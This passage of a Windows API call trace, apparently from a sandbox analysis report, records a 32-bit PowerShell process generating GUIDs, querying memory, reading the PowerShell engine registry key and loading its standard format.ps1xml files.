	[0225.023] VirtualQuery (in: lpAddress=0xad74c, lpBuffer=0xae74c, dwLength=0x1c | out: lpBuffer=0xae74c*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.024] VirtualQuery (in: lpAddress=0xad400, lpBuffer=0xae400, dwLength=0x1c | out: lpBuffer=0xae400*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.025] VirtualQuery (in: lpAddress=0xad400, lpBuffer=0xae400, dwLength=0x1c | out: lpBuffer=0xae400*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.025] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x58a133e6, Data2=0xcc85, Data3=0x4a69, Data4=([0]=0x9e, [1]=0x8f, [2]=0x52, [3]=0x31, [4]=0x78, [5]=0x9f, [6]=0xf1, [7]=0xb2))) returned 0x0
	[0225.025] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x21d0a874, Data2=0xf80, Data3=0x4772, Data4=([0]=0xb1, [1]=0x68, [2]=0xbc, [3]=0x8e, [4]=0x7b, [5]=0x3a, [6]=0x8c, [7]=0x7a))) returned 0x0
	[0225.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.025] GetLastError () returned 0x57
	[0225.025] SetErrorMode (uMode=0x1) returned 0x1
	[0225.025] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0225.025] GetLastError () returned 0x0
	[0225.025] GetFileType (hFile=0x358) returned 0x1
	[0225.025] SetErrorMode (uMode=0x1) returned 0x1
	[0225.026] GetFileType (hFile=0x358) returned 0x1
	[0225.026] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.026] GetLastError () returned 0x0
	[0225.027] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.027] GetLastError () returned 0x0
	[0225.027] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.027] GetLastError () returned 0x0
	[0225.027] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.027] GetLastError () returned 0x0
	[0225.027] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.027] GetLastError () returned 0x0
	[0225.027] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.027] GetLastError () returned 0x0
	[0225.027] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.027] GetLastError () returned 0x0
	[0225.027] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.028] GetLastError () returned 0x0
	[0225.029] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.029] GetLastError () returned 0x0
	[0225.029] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.029] GetLastError () returned 0x0
	[0225.030] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.030] GetLastError () returned 0x0
	[0225.030] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.030] GetLastError () returned 0x0
	[0225.030] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.030] GetLastError () returned 0x0
	[0225.030] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.030] GetLastError () returned 0x0
	[0225.031] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.031] GetLastError () returned 0x0
	[0225.031] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.031] GetLastError () returned 0x0
	[0225.033] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.033] GetLastError () returned 0x0
	[0225.034] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0xbce, lpOverlapped=0x0) returned 1
	[0225.034] GetLastError () returned 0x0
	[0225.034] ReadFile (in: hFile=0x358, lpBuffer=0x2cb0fce, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb0fce*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0225.034] GetLastError () returned 0x0
	[0225.034] ReadFile (in: hFile=0x358, lpBuffer=0x2cb1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2cb1860*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0225.034] GetLastError () returned 0x0
	[0225.034] CloseHandle (hObject=0x358) returned 1
	[0225.034] GetLastError () returned 0x0
	[0225.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.034] GetLastError () returned 0x0
	[0225.034] SetErrorMode (uMode=0x1) returned 0x1
	[0225.034] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cd285c | out: lpFileInformation=0x2cd285c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0225.035] GetLastError () returned 0x0
	[0225.035] SetErrorMode (uMode=0x1) returned 0x1
	[0225.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.035] GetLastError () returned 0x0
	[0225.035] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae938 | out: phkResult=0xae938*=0x358) returned 0x0
	[0225.035] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x0, lpcbData=0xae97c*=0x0 | out: lpType=0xae980*=0x1, lpData=0x0, lpcbData=0xae97c*=0x56) returned 0x0
	[0225.035] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x3582a0, lpcbData=0xae97c*=0x56 | out: lpType=0xae980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae97c*=0x56) returned 0x0
	[0225.035] RegCloseKey (hKey=0x358) returned 0x0
	[0225.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.035] GetLastError () returned 0x0
	[0225.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.036] GetLastError () returned 0x0
	[0225.036] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xf95b4558, Data2=0x7680, Data3=0x4e26, Data4=([0]=0xb4, [1]=0xa, [2]=0xef, [3]=0x17, [4]=0x3b, [5]=0xe3, [6]=0x42, [7]=0x9c))) returned 0x0
	[0225.036] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xa6358282, Data2=0x1d84, Data3=0x4421, Data4=([0]=0x96, [1]=0xc1, [2]=0x81, [3]=0x93, [4]=0x2a, [5]=0x9d, [6]=0x15, [7]=0xed))) returned 0x0
	[0225.036] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x2ac6c7c8, Data2=0x20d6, Data3=0x43ae, Data4=([0]=0x9d, [1]=0x7d, [2]=0xc2, [3]=0xb1, [4]=0xe1, [5]=0x17, [6]=0x22, [7]=0xd5))) returned 0x0
	[0225.037] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x78a44ef4, Data2=0xac25, Data3=0x4f9f, Data4=([0]=0x98, [1]=0xe9, [2]=0xfe, [3]=0x25, [4]=0x5e, [5]=0x9e, [6]=0x60, [7]=0x1c))) returned 0x0
	[0225.037] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x783b56d1, Data2=0xdfba, Data3=0x48ef, Data4=([0]=0xb2, [1]=0x51, [2]=0x3b, [3]=0x20, [4]=0x23, [5]=0x77, [6]=0x98, [7]=0x92))) returned 0x0
	[0225.037] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x12498487, Data2=0x5612, Data3=0x4033, Data4=([0]=0xb8, [1]=0x89, [2]=0xad, [3]=0xa1, [4]=0x1d, [5]=0xd9, [6]=0x7f, [7]=0x68))) returned 0x0
	[0225.037] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.037] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xbbed4e25, Data2=0x8bec, Data3=0x4175, Data4=([0]=0xb9, [1]=0x7e, [2]=0x4a, [3]=0xaa, [4]=0x4b, [5]=0x1d, [6]=0x79, [7]=0x43))) returned 0x0
	[0225.037] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.037] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.037] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xed9e1dbb, Data2=0x48f4, Data3=0x44eb, Data4=([0]=0xa5, [1]=0xf8, [2]=0xab, [3]=0x31, [4]=0x8f, [5]=0x73, [6]=0xba, [7]=0xa4))) returned 0x0
	[0225.037] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x6a1ba110, Data2=0xdd4d, Data3=0x40e7, Data4=([0]=0x87, [1]=0xe6, [2]=0x80, [3]=0x63, [4]=0xe0, [5]=0x3f, [6]=0x2e, [7]=0x57))) returned 0x0
	[0225.038] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x8f89749b, Data2=0xda3f, Data3=0x485e, Data4=([0]=0xa4, [1]=0x3b, [2]=0x2f, [3]=0x9e, [4]=0xef, [5]=0xd2, [6]=0x64, [7]=0xc4))) returned 0x0
	[0225.038] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x583f3e7b, Data2=0x7683, Data3=0x4cfc, Data4=([0]=0xa4, [1]=0xf3, [2]=0x29, [3]=0x8d, [4]=0xa6, [5]=0xea, [6]=0xbb, [7]=0xf3))) returned 0x0
	[0225.038] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.038] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x77cbf3e0, Data2=0xd908, Data3=0x40d8, Data4=([0]=0xbc, [1]=0xcd, [2]=0x88, [3]=0x37, [4]=0x17, [5]=0x6d, [6]=0x20, [7]=0xd8))) returned 0x0
	[0225.038] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.038] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.038] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.039] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.039] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.039] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x12246c20, Data2=0xe3e1, Data3=0x41ee, Data4=([0]=0xb2, [1]=0xbd, [2]=0x67, [3]=0x93, [4]=0xde, [5]=0x22, [6]=0xd1, [7]=0xc7))) returned 0x0
	[0225.039] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x2bdd1170, Data2=0xb5f5, Data3=0x46d0, Data4=([0]=0x99, [1]=0x8d, [2]=0xfe, [3]=0xac, [4]=0x47, [5]=0xf0, [6]=0xe1, [7]=0x3e))) returned 0x0
	[0225.039] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x65b807ca, Data2=0xff1, Data3=0x4f9b, Data4=([0]=0xaf, [1]=0xc, [2]=0xe9, [3]=0xe2, [4]=0xf3, [5]=0x1d, [6]=0x68, [7]=0xb1))) returned 0x0
	[0225.040] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x4bb0834, Data2=0x15a4, Data3=0x4061, Data4=([0]=0xb7, [1]=0x9f, [2]=0x45, [3]=0xab, [4]=0x9c, [5]=0xc3, [6]=0xba, [7]=0x9f))) returned 0x0
	[0225.040] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x237dcb78, Data2=0xf18c, Data3=0x495a, Data4=([0]=0x8b, [1]=0xcd, [2]=0x18, [3]=0x83, [4]=0x84, [5]=0x60, [6]=0x10, [7]=0x33))) returned 0x0
	[0225.040] VirtualQuery (in: lpAddress=0xad834, lpBuffer=0xae834, dwLength=0x1c | out: lpBuffer=0xae834*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.040] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xf8c58143, Data2=0x2c57, Data3=0x4426, Data4=([0]=0xbb, [1]=0x9a, [2]=0x1b, [3]=0x34, [4]=0x8e, [5]=0x37, [6]=0xbb, [7]=0x22))) returned 0x0
	[0225.040] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xb0ec86b2, Data2=0xe4e, Data3=0x41ef, Data4=([0]=0xa3, [1]=0x4c, [2]=0xdb, [3]=0x5e, [4]=0x33, [5]=0xaa, [6]=0xaa, [7]=0x5c))) returned 0x0
	[0225.040] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x1382f8cd, Data2=0x4063, Data3=0x43fa, Data4=([0]=0x8d, [1]=0x9d, [2]=0xc8, [3]=0x5a, [4]=0x79, [5]=0x87, [6]=0x69, [7]=0xaf))) returned 0x0
	[0225.040] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x38d5569, Data2=0x3e49, Data3=0x49b1, Data4=([0]=0xb0, [1]=0xe7, [2]=0x9b, [3]=0xf6, [4]=0x71, [5]=0x15, [6]=0x5a, [7]=0xd1))) returned 0x0
	[0225.040] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x39baf8fa, Data2=0x7cc4, Data3=0x4f1e, Data4=([0]=0xb3, [1]=0x9, [2]=0x71, [3]=0x9, [4]=0x87, [5]=0xc6, [6]=0x65, [7]=0xe8))) returned 0x0
	[0225.040] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xede42ebb, Data2=0xa1f4, Data3=0x41f3, Data4=([0]=0xad, [1]=0x76, [2]=0xfa, [3]=0xb8, [4]=0x8a, [5]=0x67, [6]=0xd4, [7]=0x82))) returned 0x0
	[0225.041] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x7c1262f5, Data2=0x4b70, Data3=0x496a, Data4=([0]=0xa5, [1]=0xd, [2]=0xea, [3]=0x84, [4]=0xd0, [5]=0x19, [6]=0x2a, [7]=0x3))) returned 0x0
	[0225.041] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xe1b8c3b6, Data2=0x6cd6, Data3=0x4e90, Data4=([0]=0xbb, [1]=0x41, [2]=0x7e, [3]=0xe1, [4]=0x57, [5]=0x2c, [6]=0x4f, [7]=0x3e))) returned 0x0
	[0225.041] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xf95eeb42, Data2=0xe5ea, Data3=0x40a4, Data4=([0]=0xb7, [1]=0xda, [2]=0x60, [3]=0xcf, [4]=0xb5, [5]=0x38, [6]=0x55, [7]=0x75))) returned 0x0
	[0225.041] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x2990f4f4, Data2=0xef92, Data3=0x4aa6, Data4=([0]=0xb8, [1]=0x52, [2]=0x7d, [3]=0xe0, [4]=0x42, [5]=0x94, [6]=0x7e, [7]=0x18))) returned 0x0
	[0225.041] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xd99d1687, Data2=0xa58a, Data3=0x4218, Data4=([0]=0x90, [1]=0xbe, [2]=0x56, [3]=0xb8, [4]=0xe5, [5]=0xdf, [6]=0xeb, [7]=0xff))) returned 0x0
	[0225.041] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x32939e2a, Data2=0x4d3f, Data3=0x4c77, Data4=([0]=0x9c, [1]=0x80, [2]=0x6c, [3]=0x75, [4]=0x12, [5]=0xa8, [6]=0x22, [7]=0xb4))) returned 0x0
	[0225.041] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x1250c39b, Data2=0x763e, Data3=0x413c, Data4=([0]=0x9b, [1]=0x8a, [2]=0x6f, [3]=0x3b, [4]=0x0, [5]=0x3b, [6]=0xe0, [7]=0x78))) returned 0x0
	[0225.041] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x2982313c, Data2=0x177b, Data3=0x4155, Data4=([0]=0xba, [1]=0x7c, [2]=0x6, [3]=0xf2, [4]=0xe4, [5]=0xbb, [6]=0x65, [7]=0xef))) returned 0x0
	[0225.041] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x5f7a8432, Data2=0x9988, Data3=0x4397, Data4=([0]=0xb3, [1]=0x91, [2]=0x52, [3]=0xd4, [4]=0xa2, [5]=0x69, [6]=0x2, [7]=0x86))) returned 0x0
	[0225.041] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x76a3238d, Data2=0xea9f, Data3=0x4ebf, Data4=([0]=0xb2, [1]=0x49, [2]=0xa6, [3]=0xfb, [4]=0x17, [5]=0x1c, [6]=0x59, [7]=0x79))) returned 0x0
	[0225.041] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x97e0d1f8, Data2=0xe726, Data3=0x489e, Data4=([0]=0xbe, [1]=0xa6, [2]=0x70, [3]=0xd1, [4]=0xbe, [5]=0xaa, [6]=0xe2, [7]=0x85))) returned 0x0
	[0225.042] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xdafb5784, Data2=0xecaf, Data3=0x4b11, Data4=([0]=0xa8, [1]=0x4f, [2]=0xec, [3]=0xb9, [4]=0x71, [5]=0xc9, [6]=0x5e, [7]=0x90))) returned 0x0
	[0225.042] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xf1464b, Data2=0xe7e7, Data3=0x45ef, Data4=([0]=0x8f, [1]=0xed, [2]=0x9e, [3]=0xb, [4]=0xe0, [5]=0x38, [6]=0xbe, [7]=0x3b))) returned 0x0
	[0225.042] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.042] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.043] VirtualQuery (in: lpAddress=0xad6e0, lpBuffer=0xae6e0, dwLength=0x1c | out: lpBuffer=0xae6e0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.045] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x24f2e22f, Data2=0x9ea2, Data3=0x4d48, Data4=([0]=0x99, [1]=0x69, [2]=0xa7, [3]=0x6d, [4]=0x5b, [5]=0xf4, [6]=0xc3, [7]=0x9b))) returned 0x0
	[0225.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0225.045] GetLastError () returned 0x0
	[0225.045] SetErrorMode (uMode=0x1) returned 0x1
	[0225.046] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0225.046] GetLastError () returned 0x0
	[0225.046] GetFileType (hFile=0x358) returned 0x1
	[0225.046] SetErrorMode (uMode=0x1) returned 0x1
	[0225.046] GetFileType (hFile=0x358) returned 0x1
	[0225.046] ReadFile (in: hFile=0x358, lpBuffer=0x2d6f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2d6f748*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.187] GetLastError () returned 0x0
